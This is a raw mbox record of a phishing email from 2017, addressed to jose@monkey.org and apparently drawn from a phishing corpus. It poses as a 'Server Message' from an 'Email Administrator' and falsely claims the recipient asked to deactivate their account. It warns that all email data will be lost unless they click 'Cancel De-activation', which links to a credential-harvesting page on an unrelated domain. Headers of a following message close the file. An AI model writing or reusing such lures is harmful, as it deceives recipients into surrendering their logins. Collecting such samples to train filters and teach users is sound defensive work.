From: Email Security Alert <test@stand.org.au>
Date: Mon, 8 May 2017 01:35:40 -0700
Message-ID: <5e03d3e731424de280e337ea267bb46c@ZUONAEX01.zuona.mnl>
Return-Path: test@stand.org.au
Status: O
X-Status: 
X-Keywords:                  
X-UID: 172

--===============1926434196==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body



   	  =

    =

   =

 =

   Server Message =

  =


 =

   Dear jose@monkey.org  Our record indicates that you recently made a requ=
est to deactivate email And this request will be processed shortly. If this=
 request was made accidentally and you have no knowledge of it, you are adv=
ised to cancel the request now =


  =

   =

    Cancel De-activation =

  =

   =

   However, if you do not cancel this request, the your account will be de-=
activated shortly =

and all your email data will be lost permanently. Regards.
Email Administrator =


  =

   =

    =

 =

   =

   This message is auto-generated from E-mail security server, and replies =
sent to this email can not be delivered. =

This email is meant for: jose@monkey.org =

  =

	=20
--===============1926434196==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><TABLE width=3D"100%" align=3Dcenter><BR>
<TBODY>
<TR>
<TD width=3D"10%"></TD>
<TD width=3D"70%">
<TABLE style=3D"BORDER-BOTTOM: #a4a4a4 1px solid; BORDER-LEFT: #a4a4a4 1px =
solid; BORDER-TOP: #a4a4a4 1px solid; BORDER-RIGHT: #a4a4a4 1px solid" cell=
Spacing=3D0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=3D0 width=3D"100%">
<TBODY>
<TR>
<TD bgColor=3D#045fb4 height=3D110><BR>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD><FONT color=3D#ffffff size=3D+4 face=3Dcalibri>Server Message </FONT></=
TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8><BR><BR>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD><FONT size=3D+2 face=3Dcalibri><B>Dear jose@monkey.org</B> </FONT>
<P><FONT size=3D3 face=3Dcalibri>Our record indicates that you recently mad=
e a request to deactivate email And this request will be processed shortly. =

<P>If this request was made accidentally and you have no knowledge of it, y=
ou are advised to cancel the request now </FONT></P></TD></TR></TBODY></TAB=
LE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D15></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8>
<TABLE width=3D"80%" bgColor=3D#045fb4 align=3Dcenter height=3D60>
<TBODY>
<TR>
<TD>
<DIV align=3Dcenter><A style=3D"TEXT-DECORATION: none" href=3D"http://pwkam=
auadvocates.com/userfile/Account/index.php?email=3Djose@monkey.org" target=
=3D_blank><FONT color=3D#ffffff size=3D+2 face=3Dcalibri>Cancel De-activati=
on </FONT></A></DIV></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D20></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D70>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD><FONT size=3D3 face=3Dcalibri>However, if you do not cancel this reques=
t, the your account will be de-activated shortly <BR>and all your email dat=
a will be lost permanently. =

<P>Regards.<BR><B>Email Administrator</B> </FONT></P></TD></TR></TBODY></TA=
BLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D10></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D0>
<TABLE width=3D"80%" align=3Dcenter height=3D10>
<TBODY>
<TR>
<TD>
<HR align=3Dcenter width=3D"100%">
</TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD><FONT size=3D2 face=3Dcalibri>This message is auto-generated from E-mai=
l security server, and replies sent to this email can not be delivered. <BR=
>This email is meant for: <B><FONT color=3D#045fb4>jose@monkey.org</FONT></=
B> </FONT></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D30></TD></TR></TBODY></TABLE></TD></TR></TBO=
DY></TABLE></TD>
<TD width=3D"20%"></TD></TR></TBODY></TABLE></BODY></HTML>
--===============1926434196==--

From jose@monkey.org Mon May  8 11:42:00 2017 +0000
Return-Path: poster@mailserver.com
Delivered-To: jose@monkey.org
X-FDA: 72816198000.10.bite44_68c73d8b93d02
X-Spam-Summary: 75,0,0,6ceae6b05b640404,d41d8cd98f00b204,poster@mailserver.com,:,RULES_HIT:1:2:41:72:355:379:495:800:962:967:969:973:978:983:988:989:1189:1208:1221:1260:1261:1263:1313:1314:1345:1381:1431:1433:1434:1436:1437:1516:1517:1518:1571:1575:1588:1589:1592:1594:1710:1714:1730:1777:1792:2198:2199:2525:2527:2539:2561:2564:2682:2685:2859:2890:2891:2894:2898:2899:2902:2910:2915:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3351:3804:3865:3867:3868:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4050:4321:4362:4552:4605:5007:6119:6248:6261:6650:6678:7652:8583:8603:9025:9080:9388:9908:10004:10049:10215:10234:10346:11233:11473:11480:11657:11658:11914:12043:12294:12295:12438:12517:12519:12555:12740:12812:12895:12986:13025:13038:13132:13139:13161:13229:13231:13237:13439:14096:14141:14246:14687:14846:21063:21080:21212:21433:21450:21451:21483:21524:21611:21627:30001:30003:30022:30026:30054:30058:30069:30070:30091,0,RBL:202.81.165.142-irl
X-HE-Tag: bite44_68c73d8b93d02
X-Filterd-Recvd-Size: 10336
Received: from mail.kkm-works.com (unknown [202.81.165.142])
	by imf30.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon,  8 May 2017 11:41:59 +0000 (UTC)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by mail.kkm-works.com (Postfix) with ESMTP id A1F7A349074
	for <jose@monkey.org>; Mon,  8 May 2017 19:38:05 +0800 (PHT)
Received: from mail.kkm-works.com ([127.0.0.1])
	by localhost (mail.kkm-works.com [127.0.0.1]) (amavisd-new, port 10032)
	with ESMTP id X1uwryHEkE6J for <jose@monkey.org>;
	Mon,  8 May 2017 19:38:01 +0800 (PHT)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by mail.kkm-works.com (Postfix) with ESMTP id 18EBB348E39
	for <jose@monkey.org>; Mon,  8 May 2017 19:38:01 +0800 (PHT)
X-Virus-Scanned: amavisd-new at kkm-works.com
Received: from mail.kkm-works.com ([127.0.0.1])
	by localhost (mail.kkm-works.com [127.0.0.1]) (amavisd-new, port 10026)
	with ESMTP id x9v9HdIAiQJY for <jose@monkey.org>;
	Mon,  8 May 2017 19:38:00 +0800 (PHT)
Received: from [45.76.221.195] (unknown [45.76.221.195])
	by mail.kkm-works.com (Postfix) with ESMTPSA id 70BB0489C18
	for <jose@monkey.org>; Mon,  8 May 2017 19:38:00 +0800 (PHT)
Content-Type: multipart/alternative; boundary="===============1099521278=="
MIME-Version: 1.0
Subject: jose@monkey.org warning delivery notification
To: jose@monkey.org
